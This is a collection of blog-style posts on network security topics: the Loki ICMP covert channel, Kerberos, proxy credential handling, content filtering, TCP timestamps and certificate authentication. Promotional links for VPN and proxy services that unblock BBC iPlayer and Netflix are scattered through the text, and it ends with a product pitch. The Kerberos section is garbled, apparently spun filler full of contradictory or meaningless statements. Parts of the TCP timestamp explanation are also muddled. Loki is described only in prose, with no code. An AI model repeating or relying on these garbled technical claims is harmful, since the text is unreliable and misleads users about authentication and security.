Loki – How ICMP Really Can be Dangerous

Overall ICMP has been viewed as quite a harmless and perhaps even trivial protocol. However that all changed with the rather nasty Loki.  In case you didn’t know Loki is from Norse mythology and he was the god of trickery and mischief.  The Loki exploit is well named and seeks to exploit the hither to benign ICMP protocol.  ICMP is intended mainly to inform users of error conditions and to make very simple requests.  It’s one of the reasons intrusion analysts and malware students tended to ignore the protocol.  Of course it could be used in rather obvious denial of service attacks but they were easily tracked and blocked.

However Loki changed that situation as it used ICMP as a tunneling protocol as a covert channel. The definition of a covert channel in these circumstances is a transport method used in either a secret or unexpected way. The transport vehicle is ICMP but Loki acts much more like a client/server application.  Any compromised host that gets a Loki server instance installed can respond to traffic and requests from a Loki client.   Which would also work if the client was spoofing their IP address to watch something like Netflix for instance – see this.  So for instance a Loki server could respond to a request to display the password file to screen or file. That could then be possibly captured and cracked by the owener of the Loki client application.

Many intrusion detection analysts would have simply ignored ICMP traffic passing through their logs.  Mainly because it’s such a common protocol but also an such an innocuous one.  Of course well read analysts will know treat such traffic with heightened suspicion, Loki really has changed the game for protocols like ICMP.

For those of us who spend many hours watching traffic Loki was a real eye opener.  You had to check those logs a little more carefully especially to watch out for those strange protocols being used in a different context.  There’s some more information on these attacks hidden on this technology blog – http://www.iplayerabroad.com/using-a-proxy-to-watch-the-bbc/.  It can take some finding though !!

 

Introduction to Kerberos Authentication

It’s one of the most widely used methods of authentication and this post will briefly introduce you to the subject. As well as being implemented into many operating systems you will find Kerberos is available in many industrial products too. Kerberos hasn’t been tested or verified. Kerberos has many crucial benefits. Kerberos has a few main flaws that system administrators want to take into consideration. Kerberos is the most frequently used example of this sort of authentication technology.

Encryption couldn’t be enabled. The encryption key is subsequently created. Transport layer encryption isn’t necessary if SPNEGO is used, but the customer’s browser has to be properly configured. This authentication is automatic in the event the domains are in the exact same forest. This sort of authentication is rather simple to understand, since it only involves two systems. There are lots of things that could fail with Kerberos authentication. If you’re failing to utilize Kerberos authentication utilizing the LocalSystem account, you’re more than likely failing to utilize Kerberos authentication when users are going to go to the remote system. It’s not only used for authenticating users, when your iPad connects through it’s VPN to watch British Channels online using your AD network it’s Kerberos that authenticates the machine.

In the event the password is incorrect, then you won’t have the ability to decrypt the message. It is extremely important that you don’t forget this password. You might be surprised how many users utilize a password that is just like their user name.

Your password isn’t a fantastic option for a password. When employing those services or those clients, you might have to put in your password, which is subsequently sent to the server. It’s very probable that this user has set the exact same password for the two principals for reasons of convenience. Ideally, you should simply have to type your password into your private computer, once, at the start of the day.

You won’t be able to administrate your server in case you do not keep in mind the master password. In case the server cannot automatically register the SPN, the SPN has to be registered manually. Its normal in order for it to take some opportunity to begin the admin server so be patient. The specified server cannot carry out the requested operation. A digital server simply suggests that it’s not a component of dedicated host. The RPC Server isn’t actively listening.

Server refused to negotiate authentication, which is needed for encryption. Before deploying Kerberos, a server has to be selected to accept the use of KDC. The network location server is a site that is utilised to detect whether DirectAccess clients are situated in the corporate network.

The client may be using an old Kerberos V5 protocol that doesn’t support initial connection support. If he is unable to get the ticket then you should see an error similar to one below. In Kerberos protocol, he authenticates against the server and also the server authenticates itself against the client. The RPC Client will send the very first packet, called the SYN packet.

If each client should happen to require a special key for each and every service, and if each service should happen to require an exceptional key for each client, key distribution could quickly come to be a challenging problem to fix. My client is not going to send the job unless it receives the right response. The client can’t decrypt the service ticket because only servers can do so, but nevertheless, it can send it on. Later he can use this ticket to get additional tickets for SS using the same shared secret. Both client and server may also be called security principals.

John Simmons
http://bbciplayerabroad.co.uk/uk-vpn-free-trial/

Filtering Authentication Credentials

When you use a proxy or VPN server there is a very important security consideration that you should be aware of that is sometimes overlooked.  Any connection should be very careful about how it handles any authentication credentials that are sent using that connection.  For example if you are using a proxy for all your web browsing, you will need to trust that server handling any user names and passwords that you supply to those websites.  Remember the proxy will forward all traffic to the origin server including those user credentials.

The other consideration is specific proxy server authentication credentials which also may be transmitted or passed on especially if the servers are chained.  It is common for proxy credentials to be forwarded as it’s reduces the need to authenticate multiple times against different servers.   In these situations the last proxy server in the chain should filter out the Proxy-Authorization: header if it is present.

One of the dangers is that a malicious server could intercept or capture these authentication credentials especially if they’re being passed in an insecure manner.    Any proxy involved in the route has the potential for intercepting usernames and passwords.  Many people forget this when using random free proxies they find online, they are implicitly trusting these servers and the unknown administrators with any personal details leaked whilst using these connections.  When you consider that often these free servers are merely misconfigured or ‘hacked’ servers it makes using them even more risky.

It is actually a difficult situation particularly with regards to proxies about how to deal with authentication details.  The situation with VPNs are slightly more straightforward, the details are protected during the majority of the transmission because most VPNs are encrypted.  However that last step to the target server will rely on any in built in security to the connection, although this can be effected as in this article – BBC block VPN connection.

Any server can filter out and protect authentication credentials but obviously those intended for the target can’t be removed.  It is a real risk and does highlight one of the important security considerations of using any intermediate server such as a proxy.    It is important that these servers are in themselves secure and do not introduce additional security risks into the connection.  Sending credentials particularly over a normal HTTP session are already potentially insecure without a badly configured or administered proxy server as well.

Most websites which accept usernames now at least use something like SSL to protect credentials.  However although VPN sessions will transport these connections effectively many proxies are unable to support the tunneling of SSL connections properly.  Man in the middle attacks are also common against these sort of protections and using a poorly configured proxy makes this much easier than a direct connection.  Ultimately there are several points where web security and protecting the data is a concern, it’s best to ensure that a VPN or proxy doesn’t introduce additional security risks into the connection though.

Additional Reading on UK VPN Trial

 

 

Content Filtering and Proxies

Proxy servers are as explained on this site, one of the most important components of a modern network infrastructure.  No corporate network should allow ordinary desktop PCs or laptops to directly access the internet without some sort of protection.  Proxy servers provide that protection to a certain extent as long as their use is enforced.

Most users, especially technically minded ones will often resent using proxies because they will be aware of the control that this entails.   The simplest way is to ensure that configuration files are delivered automatically to the desktop by network servers.  For example in a Windows environment this can be achieved using the active directory which can ensure desktops and users receive specific internet configuration files.  For example, you can configure Internet Explorer using a specific configuration which is delivered to every desktop on login.  In addition you can also use Active Directory to block access to install other browsers and configure them.

However although this allows you to control what browser and the internet route that each user will take – it doesn’t restrict what that user can do online.  Another layer is required and most companies will employ some sort of content filtering in order to protect their environment.    However as far as your proxy server is concerned content filtering will almost obviously have a major impact on performance.

One of the most common forms is that of URL filtering and this has one of the biggest performance impacts.  This is largely due to the fact that this sort of filtering inevitably has many types of patterns to match against.   Content filtering will severely impact the performance of a proxy server because of the sheer volume of data that is involved.  Even running a nominal content filter against a UK VPN trial had a similar effect.

There are a variety of different types of filtering such as HTML tag filtering, virus screening or URL screening.   It can be difficult though and the technology is developing all the time, for instance the ability to screen things like Java or ActiveX objects.

One of the biggest problems with content filtering and maintaining performance on the proxies is the fact that entire objects need to be processed.  A proxy server will need to buffer the entire file, and therefore can only proceed with the transmission after the whole file has been checked.   From the user perspective this can be frustrating as there will be long pauses and delays in their browsing especially on busy networks.   Obviously this delay can be justified in the extent of screening for viruses, however this can be controversial for other screening issues.

Further Reference: Using a Paid VPN Service

TCP Configuration: Timestamp Option

The function of the timestamp option is fairly self explanatory, it simply lets the sender place a timestamp value in each and every segment.   In turn the receiver will also reflect this value in it’s acknowledgement which allows the sender to calculate a round trip time for every received ACK.    Remember this is indeed per ACK and not segment as this can include multiple segments.

Initially most implementations of TCP would only allow one RTT per window however this has changed and nowadays larger windows sizes need more accurate RTT calculations.   You can read about the definitions of these calculations in RFC 1323 which covers the TCP enhanced extensions that allow these improved RTT calculations. The time is estimated by sampling a data signal at a lower frequency one time per window which works well with smaller windows (and less segments).

Accurate measurement of data transmission is often very difficult in congested and busy networks also when troubleshooting across networks like the internet.  It’s difficult to  isolate issues and solve problems in these sort of environments because you have no control or access to the majority of the transport hardware.  For example if you are tryign to fix a Netflix VPN problem remotely being able to check the RTT is essential to analyse where the problems potentially lie.

The sender will place a 32 bit value in the initial field which will be echoed back by the receiver in the reply field. This will increase the size of the TCP header from 20 bytes to 32 bytes when this option is used. The timestamp value will increase value on each transaction. There is no clock synchronization between the sender and the receiver merely an increase in the value of the timestamp unit. Most implementations of the timestamp option recommend that the value increment in units of one ideally between 1 millisecond and 1 second.

This option is configured during the connection establishment and is handled the same way as the windows scale option in the previous section. As you may know the receiving connection does not have to acknowledge every data segment it receives. This however is simplified because only a single timestamp value is maintained per active connection which is updated according to simple algorithm.

First of all TCP monitors the timestamp value ensuring it has the correct value to send in the next ACK. The sequence number is updated after each ACK value is sent and not as it’s acknowledged. After a new segment arrives then the byte numbered in a variable called lastack is incremented. After a new segment arrives then this value is increased but the old value stored in a variable called tsrecent, When a timestamp option is sent the tsrecent value is sent, and the sequence number field is stored in the variable called lastack.

This means that in addition to the timestamp option allowing for better RTT calculation it also performs another function. The receiver can use the function to avoid receiving old duplicate segments using an addition feature called PAWS – Protection against Wrapped Sequence Numbers.

Further Reading on Commercial Proxy Options – http://www.anonymous-proxies.org/2017/05/buy-uk-proxy-ip-address.html

Security Specifications and Initiatives

Throughout the internet community, there are many groups working on resolving a variety of security related issues online.    The activities cover all aspects of internet security and networking in general from authentication, firewalls, one time passwords, public key infrastructure, transport layer security and much more.

Many of the most important security protocols, initiatives and specifications being developed can be researched at the following groups.

TCSEC (Trusted Computer System Evaluation Criteria)

These are requirements for secure products as defined by the US National Security Agency.   These are important standards which many US and global companies use in establishing base lines for their computer and network infrastructure.    You will often hear these standards referred to as the ‘Orange book’.

CAPI (Crypto API)

CAPI is an application programming interface developed by Microsoft which makes it much easier for developers to create applications which incorporate both encryption and digital signatures.

CDSA (Common Data Security Architecture) 

CDSA is a security reference standard primarily designed to help develop applications which take advantage of other software security mechanisms.   Although not initially widely used, CDSA has since been accepted by the Open Group for evaluation and technical companies usch as IBM, Netscape and Intel have aided in developing the standard further.  It is important for a disparate communication medium such as the internet to have open and inter-operable standards for applications and software.   The standard also includes an expansion platform for future developments and improvements in security elements and architecture.

GSS-API – (Generic Security Services API)

The GSS-API is a higher level interface that enables applications and software an interface into security technologies.  For example it can act as a gateway into private and public key infrastructure and technologies.

This list is of course, a long way from being complete and because of the fast paced development of security technologies it’s very likely to change greatly.   It should be remembered that although there is an obvious requirement for security at the server level,   securing applications and software on the client is also important.   Client side security is often more of a challenge due to different platforms and a lack of standards – configuration settings on every computer are likely to be different.

Many people now take security and privacy extremely seriously, especially now that so much of our lives involve online activities.  Using encryption and some sort of IP cloaker like this to provide anonymity is extremely common.  Most of these security services are provided by third parties through specialised software.   Again incorporating these into some sort of common security standard is a sensible option yet somewhat difficult to achieve.

Further Reading: Netflix VPN Problem, Haber Press, 2015

Certificate Based Client Authentication

One of the most important features of SSL is it’s ability to authenticate based on SSL certificates.  Often people fail to understand that this certificate based authentication can only be used when SSL is functioning, it is not accessible in other situations.    Take for example the more common example on the web of insecure HTTP exchanges – this means that SSL certificate based authentication is not available.  The only option here is to control access by using basic username password authentication.  This represents possibly the biggest security issue on the internet today because this also takes place in clear text too!

Another common misconception is with regards the SSL sessions themselves.  SSL sessions are established between two endpoints.  The session may go through a SSL tunnel which is effectively a forward proxy server.    However secure reverse proxying is not SSL tunnelling it’s probably better described as HTTPS proxying although this is not a commonly used term.   In this example the proxy acts as an endpoint of one SSL session, accepting the endpoint of one SSL session and forwarding the request to the origin server.

The two sessions are distinct except of course they will both be present in the cache and memory of the proxy server. An important consequence of this is that the client certificate based authentication credential are not relayed to the origin server.   The SSL session between the client and the reverse proxy server authenticates the client to the proxy server.  However the SSL session between the origin server and the proxy authenticates the server itself.   The certificate presented to the origin server is the reverse proxy’s certificate and the origin server has no knowledge of the client and it’s certificate.

Just to summarise this is the ability to authenticate the client to the origin server though the reverse proxy server.

In these situations where client based certificate based authentication and access control are required, the role would have to be performed by the reverse proxy serve.  In other words the access control function has been delegated to the proxy server.  Currently there is no protocol available for for transferring access control data from the origin server to the reverse proxy server.    However there are situations in advanced networks where the access control lists can be stored in an LDAP server for example in Windows Active directory domains.   This enables all unverified connections to be controlled, e’g blocking BBC VPN connections from  including outbound client requests to the media servers.

The reverse proxy could be described in this situation as operating as a web server.  Indeed the authentication required by the reverse proxy is actually web server authentication not proxy server authentication.    Thus crucially the challenge status code is HTTP 401 and not 407.  This is a crucial difference and a simple way to identify the exact authentication methods which are taking place on a network if you’re troubleshooting.

 

Video Proxy – How to Unlock the World’s Best Media Sites

When you read about the internet, it’s usually about how it’s constantly expanding and growing but that’s not strictly true.   Although new information is being added all the time, the reality is that much of this is often inaccessible in particular when you’re looking at videos website.

For instance take the example of one of the world’s most popular websites the BBC iPlayer. Even if you remove page titles , it contains thousands of programmes, videos and radio broadcasts and indeed is updated every single day.   It’s a wonderful resource which is continually refreshed, yet unfortunately the site is not accessible when you are located outside the United Kingdom unless you use something like a video proxy to help you. So why is so difficult to access these sites, why do people who happen to be away from home, perhaps in France Roubaix or a seaside town in Spain be constantly search for ways to unblock video pages on YouTube and the big media sites?

It’s an incredible situation, yet one that is becoming increasingly common – the internet is becoming compartmentalised, split into geographical sectors controlled by the internet’s big players.   The method used is something called geo-blocking or locking and the majority of large web sites use it to some extent. You’ll find that a particular site will remove objects based on your location, in fact some countries it’s almost impossible to watch videos on any of the major platforms.   Now the method has been criticised from all sorts of civil liberty organisations. Indeed the EU itself has made criticism which you can find here because it also undermines it’s concept of a Single Free Market.

The technology implemented varies slightly from site to site, yet it’s basically the same – record IP address and look up it’s location from a central database of addresses. So when you try and visit the BBC web site to watch a David Attenborough definition, if your IP address isn’t registered in the UK then you’ll get blocked.

Video proxy

Planet Earth Documentaries on BBC iPlayer

It’s extremely frustrating especially for someone from the UK, and so the workarounds were created.  Now I mentioned above the concept of a video proxy to bypass these and it does work to some extent.  You bounce your connection off an intermediate proxy server based in the location you need, which effectively hides your true IP address and location and will unblock video sites easily

However it’s important to remember that from 2016 onwards simple proxies no longer work on any of the major media sites.  Forget about the thousands of simply unblock sites that promise to bypass internet restrictions, they simply don’t work anymore. Unfortunately  without even simple ssl encrypted connections they can be detected easily and all the sites block them automatically. Some of them are still able to unblock Youtube videos but even those are fairly rare now. Many of them have been blocked at the server level and their hosting services have told them to remove scripts like Glype, Unfortunately the days of the free proxy sites and web proxies have now gone for good at least for being able to access videos sites and large multimedia companies who provide the top rated video production.

However the concept does still work just like the old video proxy method, it’s just you’ll need a securely configured VPN server which cannot be detected.   The encryption is useful giving you the insurance of anonymity whilst able to allow cookies to flow down the connection transparently too. This works in the same way hiding your real address and instead presenting the address of the VPN server.  So using this method, you can watch any media site from Hulu to Netflix and the BBC irrespective of your location.  Unfortunately most simple proxies are now blocked so even the best free proxy sites are useless for accessing media sites like these.

Here’s one in action using a proxy to watch video content from the BBC –


It’s a highly sophisticated program that will allow you to proxy video through a secure connection, also fast enough to allow you to watch video without buffering. It’s very easy to use to unblock video and you’ll find it can bypass internet filters too which are also commonly implemented. The demo version is available to test it out, it won’t function as a YouTube proxy unfortunately but you can at least use the free version to unblock Facebook.   The main program works on PCs and laptops but unlike simple unblock proxy sites you can use it as a video proxy mobile by establishing a VPN connection on your smartphone or tablet – it’s relatively simple to do.

There is one other method, I should mention which you can find discussed in this article here  , it’s called Smart DNS and is a simpler alternative to using a VPN service.

It’s what literally millions of people around the world are doing right now, relaxing in the sun whilst watching the News on the BBC or their favorite US entertainment channel.  There are a lot of these services available now, but only a few that work properly.  Our recommendation doesn’t look like a TV watching VPN at first glance simply because they keep that functionality low key.  Yet for over a decade it has supported all the major media channels in a variety of countries.

It’s called Identity Cloaker – You can try their 10 day trial here – Identity Cloaker

Buy US Proxy with Transparent Proxying

When we are discussing the technological characteristics of proxies there’s one term which you will see used very often – ‘transparent’.    It can actually be used in two distinct ways when it comes to proxies.  The first is to refer to a definition which implies transparent proxying ensures that any user will see no difference to the original request whether it goes direct to the server or through a proxy.   In an ideal world pretty much all legitimate proxies would be considered ‘transparent’.

Proxies are however significantly more advanced from the early years when this original definition was created.  The term ‘transparent proxying’ now has much more meaning.  The extended definition means that transparent proxying ensures that the client software is not aware of the existence of the proxy server in the communication stream.   This is unusual because the client was usually configured to use a proxy, perhaps by the internet settings in it’s browser configuration.    Software would then make a decision in it’s requests and perhaps distinguish between proxy and direct requests.

When transparent proxying, in it’s modern context, is used the router is programmed to redirect the request through the proxy not the client. This means that the proxy can actually be used to intercept and control all HTTP requests that are targeted by outbound connections.  The request can even be parsed or perhaps even filtered and redirected.  This control allows the network to configure access control rules on all outbound requests,  A company network could use these to ensure unsuitable requests are not being made from a corporate network e.g. illegal web sites.

This level of transparent proxying leaves the client completely unaware of the existence of an intermediate proxy server.   There are some caveats though and the proxy can be detected in certain circumstances.  For  example there is little point in investing in a USA proxy buy if the server only supports HTTP/1.1 because the protocol makes no allowance for transparency in proxying information.

One of the main issues and indeed worries is that allowing completely transparent proxying might cause other issues particularly in the client side applications.  For example one of the fundamentals of using proxies in a corporate network is to reduce traffic by caching locally.  This could cause all sorts of problems if the behaviour of the proxy cache effects communication between the destination server and the client application.

Further Reading – http://www.changeipaddress.net/us-ip-address-for-netflix/

Optimizing Proxies – Protocol Performance

The importance of the data transport protocol is of course crucial to a global information network like the world wide web.  Unfortunately the HTTP/1.0 protocol has some inherent issues which are directly related to performance which have been largely addressed in version 1.1 of the protocol.  It is expected that future developments will further improve the performance of the protocol.

One issue is related to the three way handshake that is required by TCP before it can establish the connection. It is important to remember that during this handshake phase that no application data is transferred at all.  from the user perspective the delay will simply appear as latency in getting the initial connection established.   This three way handshake involves a considerable overhear preceding data transfer and has a noticeable effect on performance particularly in busy networks.

This problem is made worse by using the HTTP 1.0 protocol which makes extensive use of new connections.  In fact every new request requires a new TCP connection to be established, complete with a new three way handshake.  This was originally implemented as a measure to boost performance because it was thought that it would avoid long lived idle connections being left dormant.  The reasoning was that it was more efficient to establish new connections when required as the data burst would be small and frequent.

However the web has not developed like this and it’s is much more than a series of short html files quickly downloaded.  Instead the web is full of large documents and pages embedded with videos and images.  Add to the the multitude of applets, code and other embedded objects and this soon adds up.  What’s more each of these objects usually has it’s own URL and so requires a separate HTTP request for each.    Even if you invest in a high quality US proxy you’ll find some impact on speed using HTTP 1.0 simply due ti the huge number of connection requests it generates.

There were modifications made to increase the perceived performance from the user perspective.  For one, the use of multiple simultaneous connections was allowed and this would allow client software like browsers to download and render multiple components on a page.  This meant that the user wasn’t left waiting as individual components were loaded separately.  However although parallel connections increase performance on an individual level, they generally have a very negative impact on the network as a whole.   The process is still inefficient and allowing parallel connections does little to mitigate this situation.

As any network administrator knows, focussing on a single aspect of network performance is rarely a good idea and will almost never improve overall network performance.    The persistent connection feature was introduced to help solve this, and was added as a non-standard extension to HTPP 1.0 and included by default with HTTP 1.1.

Further Reading: Proxies Blocked by BBC Abroad